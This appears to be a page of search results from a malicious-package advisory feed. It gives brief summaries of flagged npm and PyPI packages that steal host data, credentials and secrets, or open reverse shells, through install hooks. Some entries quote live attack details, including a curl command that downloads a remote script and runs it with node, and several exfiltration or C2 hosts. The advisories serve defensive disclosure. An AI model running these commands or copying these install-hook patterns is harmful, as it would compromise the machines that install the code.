225956 matches found
Malicious code in node-fetch-utils (npm)
Source: amazon-inspector 78aef0d64a7d761d2987d27aea462083425e5692475cd81332b7a3152c754308 On Windows, scripts/postinstall.js XOR-decodes a hardcoded C2 host node22.lunes.host:3258, authenticates with a 5-minute rolling HMAC-SHA256 token,...
Malicious code in vitest-cli (npm)
Source: amazon-inspector 27abcc7f2373309feb253b0cc48b1a8bae7c54a3c43aed0c57add697f4067aba Package name vitest-cli impersonates the official Vitest project while declaring empty author, homepage, repository, and bugs metadata. The...
Malicious code in zomato-espresso (npm)
Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...
Malicious code in zomato-mcp (npm)
Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...
Malicious code in zomato-core (npm)
Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5 package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...
Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261 package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...
Malicious code in test-package-sajsdkashdj (npm)
Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87 package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...
Malicious code in search-from-feed (npm)
Source: amazon-inspector c9291507e6e48bff8b92fcd9dd1f51345077f59aae2692f3d7ca84a8c0581b04 [email protected] is a dependency-confusion attack package. package.json declares both preinstall and postinstall as node callback.js, so the...
Malicious code in gd-auth-client (npm)
Source: amazon-inspector 4de00613e21b42bf3c651995beae63ff9d85772b9370145152d172a062be4fb7 package.json declares preinstall: node index.js, which runs automatically on npm install. index.js requires os, dns, https, querystring, and the loca...
Malicious code in respects-switch (npm)
respects-switch is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.0.0, the canonical floating-version bait use...
Malicious code in onboarding-respects-modal (npm)
onboarding-respects-modal is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait use...
Malicious code in crud-respect (npm)
crud-respect is a dependency confusion proof-of-concept package published to the public npm registry by the account r0binak and self-labeled "Security research PoC - Dependency Confusion Hunter". It was published at the artificially high version 999.99.99, a floating-version bait used to outrank ...
Malicious code in inversiones-common (PyPI)
Source: amazon-inspector 347a767ebbbb5843e6b005c167d98c9ab7b3ea943fadd88401682f2a2b14b2a4 setup.py executes a beacon function at module top level before setup is called, so the payload fires automatically on pip install inversiones-common...
Malicious code in fork-angular-daterangepicker (npm)
Source: amazon-inspector d81ecc9a5b511f1d867597c3834e62c3c174209ba7718db45bf27af5d862d90f package.json declares a preinstall lifecycle hook "preinstall": "node index.js" that runs index.js on every npm install. index.js line 3 hardcodes...
Malicious code in hyperpure-core (npm)
Source: ossf-package-analysis 1646c4910046d5c497ba97d75067f1b566f5bfe79ba938e0b9d06eda3b2eefa3 The OpenSSF Package Analysis project identified 'hyperpure-core' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
Malicious code in blinkit-core (npm)
Source: ossf-package-analysis 304234c334dce7d26c040f318d608e24b53db9b0b7b0b27d3a6dd2c040481b15 The OpenSSF Package Analysis project identified 'blinkit-core' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
Malicious code in zomato-sushi (npm)
Source: amazon-inspector 6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c package.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname hostname -f, whoami, current...
Malicious code in zomato-logger (npm)
Source: amazon-inspector 3dccb8b8b32337c2a257a763c273e03367ec07c904b5db0c07dbf514d546709d On npm install, the package's preinstall lifecycle script in package.json runs curl to POST the installer's hostname, current user whoami, working...
Malicious code in zomato-server (npm)
Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...
Malicious code in zomato-config (npm)
Source: amazon-inspector 3a1b48a397992964f8f3982dc69a33431bfb26c911c29a1e5d124581cef46a40 Dependency-confusion package targeting an internal Zomato namespace. The package ships only a stub index.js module.exports = name: 'zomato-config',...
Malicious code in jsonschema-viewer (PyPI)
Source: kam193 76cad60a803b91e4da8eb438787ca5f044fd3deafedef5de1fdb4e92bd8fd9e1 Package configures an entry point command line that executes a remote script. It then downloads next-stage malware, which acts as the next dropper for a fileless...
Malicious code in requests-enhancer (PyPI)
Source: kam193 950c9d9155d6ba10a8d63c365fc6c7cc97d8bc6210165f93282d9e198ed3dd62 Malicious package with a chain of multiple manual dependencies to finally download malicious code. During import, it manually downloads a dependency from GitHu...
Malicious code in sf-storybook (npm)
Source: ossf-package-analysis 961d26175eb7b4d34d87e6cb162f4b9d5a9febcb520b24a4512406d492a829b5 The OpenSSF Package Analysis project identified 'sf-storybook' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...
Malicious code in d0rk3r (PyPI)
Source: kam193 d0d4cf20ac250e3d7a23666cf8bc3ae722d555b982649dad3f615d9c7c8818d9 The package declares malicious dependencies. Their activity is, however, not triggered, as since version 1.0.4 the package's releases lack any source code...
Malicious code in d0rk3r-telemetry (PyPI)
Source: kam193 1f9f4d4943d02f9c78e513a75b4b0fcfd47d1e0486e79df9fe52f2112d840163 During import, the package exfiltrates browser data, SSH keys and other credential files, env variables and other sensitive data. --- Category: MALICIOUS - The...
Malicious code in request-cache-py (PyPI)
Source: amazon-inspector eafb96e46544cb1351d26caf52bff79055bc205a1f8454737b677fff8fbc6fea request-cache-py impersonates the legitimate requests-cache HTTP caching library. On import requestcachepy, the package's __init__.py starts a background...
Malicious code in free-anthropic-claude (npm)
Source: amazon-inspector 11bfe96b56a6615a50639b25de793e14044ea393c2029b26fa4e1b9e3dc5a22f This package impersonates the Anthropic Claude SDK name and description claim to be an 'Official Anthropic Claude SDK wrapper', author is...
Malicious code in atlasora-config (npm)
Source: amazon-inspector f33093da9f0bcf9358f3b00bd87e723d95267074539c72511ab58bff4172f092 The package declares a postinstall hook in package.json "postinstall": "node install.js" that auto-executes install.js on every npm install. install....
Malicious code in atlasora-shared (npm)
Source: amazon-inspector e1bd49976f774ef8357d29c74bc366b851e69a611cc5894f1a59621d91f9daba package.json declares "postinstall": "node install.js", causing install.js to run automatically on npm install. install.js requires https, fs, os, an...
Malicious code in atlasora-api (npm)
Source: amazon-inspector 9776899942c749b493911ca4e33c3b4967308a816e167bd3ee90c95800632f92 Package declares a postinstall hook "postinstall": "node install.js" that runs install.js automatically on npm install. install.js imports https, fs,...
Malicious code in atlasora-types (npm)
Source: amazon-inspector 7af2118f668c8e39caf15aeb52d365083d5bc6b9c1ae4d9ff6d007d348ba8b9e On npm install, the package runs install.js via the postinstall lifecycle hook. The script harvests installer-side secrets and POSTs them as JSON to ...
Malicious code in atlasora-sdk (npm)
Source: amazon-inspector cc75492c0a0ce4090918bfdef0cea9cc028ef4c8273283d32085189e13a59c51 Package ships a postinstall hook package.json scripts.postinstall: node install.js that runs automatically on every npm install. install.js reads...
Malicious code in atlasora-utils (npm)
Source: amazon-inspector cf7c54cd0923afe13aadf778a5c213363c521e7a50c4b9e235bf6c7cf58a973d On npm install, the package's postinstall hook node install.js, declared in package.json harvests secrets from the installer's machine and POSTs them...
Malicious code in atlasora-client (npm)
Source: amazon-inspector fbd4392d81da887d2d7da24519df3a7d9341ee45e1fc091a724c4f5ede766ae5 package.json declares "postinstall": "node install.js", which runs automatically on npm install. install.js requires https, fs, os, and child_process;...
Malicious code in @withgoogle/stitch-sdk (npm)
@withgoogle/stitch-sdk is a scope-squatting package on npm that impersonates Google's Stitch AI design tool SDK. The attacker registered the @withgoogle scope to mimic Google's withgoogle.com domain and published versions 0.1.1 and 0.1.2 under the account maximus-mcmillan on June 19, 2026. The...
Malicious code in query-profile (PyPI)
Source: kam193 9a60c7fce9ec29fa327128c80bca74a51b9f1965c50c6dc9286016fa31001bf1 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...
Malicious code in yian666aikf (npm)
Source: amazon-inspector f96776bdaabacae768376d5c1ff3543f77d94b41298d3d01365032817c3cd53e [email protected] advertises itself as a lightweight string-manipulation utility library, but its only on-install effect is to launch a reverse shell...
Malicious code in yianzzkf6687 (npm)
Source: amazon-inspector a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9 On npm install, the postinstall hook scripts/postinstall.js detach-spawns scripts/shell.js with detached: true, stdio: 'ignore', windowsHide: true an...
Malicious code in fluent-dashboard-panel-metrics (PyPI)
Source: amazon-inspector 9e745c609fb43daaa93911ae2edcb05b1ffd3cec1c6ec55c321597e9e39eb153 fluentpanelmetrics/__init__.py defines an undocumented function bootstrapruntimeprofile and invokes it unconditionally at module top level. The function...
Malicious code in improvado-layout-panel-metrics (PyPI)
Source: amazon-inspector 61cc6b0b5d5efe4675f4159e8bc8f6380970614c1dc36b553207fa73fa66104e The package's top-level fluentpanelmetrics/__init__.py defines bootstrapruntimeprofile and unconditionally invokes it at import. The function opens a TCP...
Malicious code in django-auth-middleware-plus (PyPI)
Source: amazon-inspector 6cf58978ba5eec5220b4b4d85966efff31d31d164ff103f98dfd627381e061ec On import, djangoauthmiddlewareplus/__init__.py spawns a daemon thread that POSTs a JSON payload containing the host's hostname, username, cwd, environme...
Malicious code in free-claude (npm)
Source: ghsa-malware dbcf53e9c254b18b24a10378af086468449a29be879ee1e5c8e360a194b09a41 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in base_parts_ai (npm)
Source: amazon-inspector 07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219 When a user runs the package's jcc or jcx CLI, lib/aiutils.js polls https://jai.jaskle.cn/hm/hmpub/aicccfg for a newVer value and, if it differs from...
Malicious code in routecraft (npm)
Source: amazon-inspector a0c4f17a9e94ab9fdbab7325f597551a6c0ba5b9e210cb0b7e28d3b86b4766d0 [email protected] ships verbatim Express.js source lib/routecraft.js, lib/application.js, lib/request.js, lib/response.js, lib/utils.js, lib/view.js —...
Malicious code in aikaf668897 (npm)
Source: amazon-inspector 450730a92143c06530923dacda588a17252ebc7edc9ddf71ff520446de5a3293 On npm install, the package's postinstall hook node scripts/postinstall.js spawns a detached background Node process running scripts/shell.js with...
Malicious code in aikaf6688812 (npm)
Source: amazon-inspector fcdebe342ec1c629835301869934fab1a4800c98116a337ec33b05def92d33e7 package.json declares a postinstall hook that runs scripts/postinstall.js, which spawns scripts/shell.js as a detached, stdio-ignored background...
Malicious code in aikaf788812 (npm)
Source: amazon-inspector c91950cef6a5f877a4a9bca074501e4c910dc50008d4c8c2623ddc21f08e31f2 Package masquerades as a string-utility library but ships a postinstall backdoor. On npm install, scripts/postinstall.js spawns scripts/shell.js as a...
Malicious code in create-mono-package (npm)
Source: amazon-inspector 85402ef2db7bfd9e2bb01034a533e52649cf6058cc1e824e9c273aee5ae8121d The package's postinstall hook .prepare.cjs collects host fingerprint data os.hostname, os.userInfo.username, platform/arch, all non-internal network...
Malicious code in @chunklab/hexparse (npm)
Source: amazon-inspector 56ad779454aa221e4a3d5a13725428059b40edd7cd8a4329ef382348bc493013 Package advertises itself as a small hex/base64/endianness codec library, but every exported encode/decode function encodeHex, decodeHex,...
Malicious code in @bytemend/mfebus (npm)
Source: amazon-inspector b3d53776853d18aabf967b0f1882eb45f2164feedd600eeccc927f496002f5e4 The package advertises itself as a small in-memory pubsub library but its main entry dist/index.js eagerly requires dist/bootstrap.js, a 277KB...